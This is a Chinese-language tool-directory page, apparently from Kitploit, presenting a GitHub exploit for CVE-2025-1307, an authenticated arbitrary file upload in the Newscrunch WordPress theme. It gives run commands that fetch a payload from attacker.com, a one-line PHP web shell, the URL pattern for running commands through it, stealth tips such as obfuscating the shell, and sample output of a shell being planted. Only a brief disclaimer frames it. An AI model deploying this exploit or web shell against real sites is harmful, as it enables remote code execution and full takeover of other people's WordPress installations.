Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - 需认证(订阅者+)任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-1307
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - 需认证(订阅者+)任意文件上传

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Newscrunch 漏洞利用 (CVE-2025-1307)

🚨 概述

该漏洞利用针对 Newscrunch WordPress 主题中的一个严重漏洞(CVE-2025-1307)。由于 newscrunch_install_and_activate_plugin() 函数缺少权限检查,该缺陷允许已认证用户(订阅者及以上)上传任意文件。这可能导致远程代码执行 (RCE),从而完全入侵受影响的 WordPress 站点。


🔥 漏洞详情

  • CVE ID: CVE-2025-1307
  • 受影响软件: Newscrunch WordPress 主题 (<= 1.8.4.1)
  • CWE 分类: CWE-862 - 缺少授权
  • CVSS 评分: 9.8(严重)
  • 攻击向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 发布日期: 2025 年 3 月 4 日

🛑 严重性与影响

  • ✅ 远程代码执行 (RCE)
  • ✅ 完全系统入侵
  • ✅ 未授权文件上传
  • ✅ 权限提升风险

可利用性: 需要一个具备订阅者权限或更高权限的有效 WordPress 账户。


📜 脚本功能

✅ 自动利用 CVE-2025-1307
✅ 自动检测易受攻击的主题版本
✅ 自动提取并执行 ZIP 载荷
✅ 从 ZIP 中动态获取 shell 文件名
✅ 利用后自动检查 shell 可用性
✅ 清晰且结构化的日志记录,便于调试


🚀 使用方法

📌 先决条件

确保已安装 Python 3.x,并安装所需的依赖:

root@kitploit:~
pip install requests urllib3 packaging

🔧 运行漏洞利用

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 用法

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ 使用上传的 Shell

shell 成功上传后,即可在目标系统上执行远程命令。shell 文件应放置在 ZIP 压缩包内,利用时会被自动提取。

🔹 创建 ZIP 载荷

确保你的 PHP shell (shell.php) 位于 ZIP 压缩包内。然后,使用该漏洞利用上传 ZIP 文件。

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 执行命令

你可以通过浏览器访问 shell URL 并附加 cmd 参数来执行系统命令:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ 保护 Shell

  • 由于这是一个简单的 Web shell,它缺乏身份验证,应谨慎使用。
  • 一旦被发现,管理员可以轻松将其删除。
  • 为进行隐蔽操作,请考虑使用混淆的 PHP 代码或受密码保护的 shell。

🔹 预期输出

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ 免责声明

此工具仅供教育和安全研究目的使用。未经授权利用漏洞属于违法行为,将受到法律制裁。作者不对因使用此工具造成的任何误用或损害负责。请负责任地使用。

作者:Nxploit | Khaled Alenazi

下载工具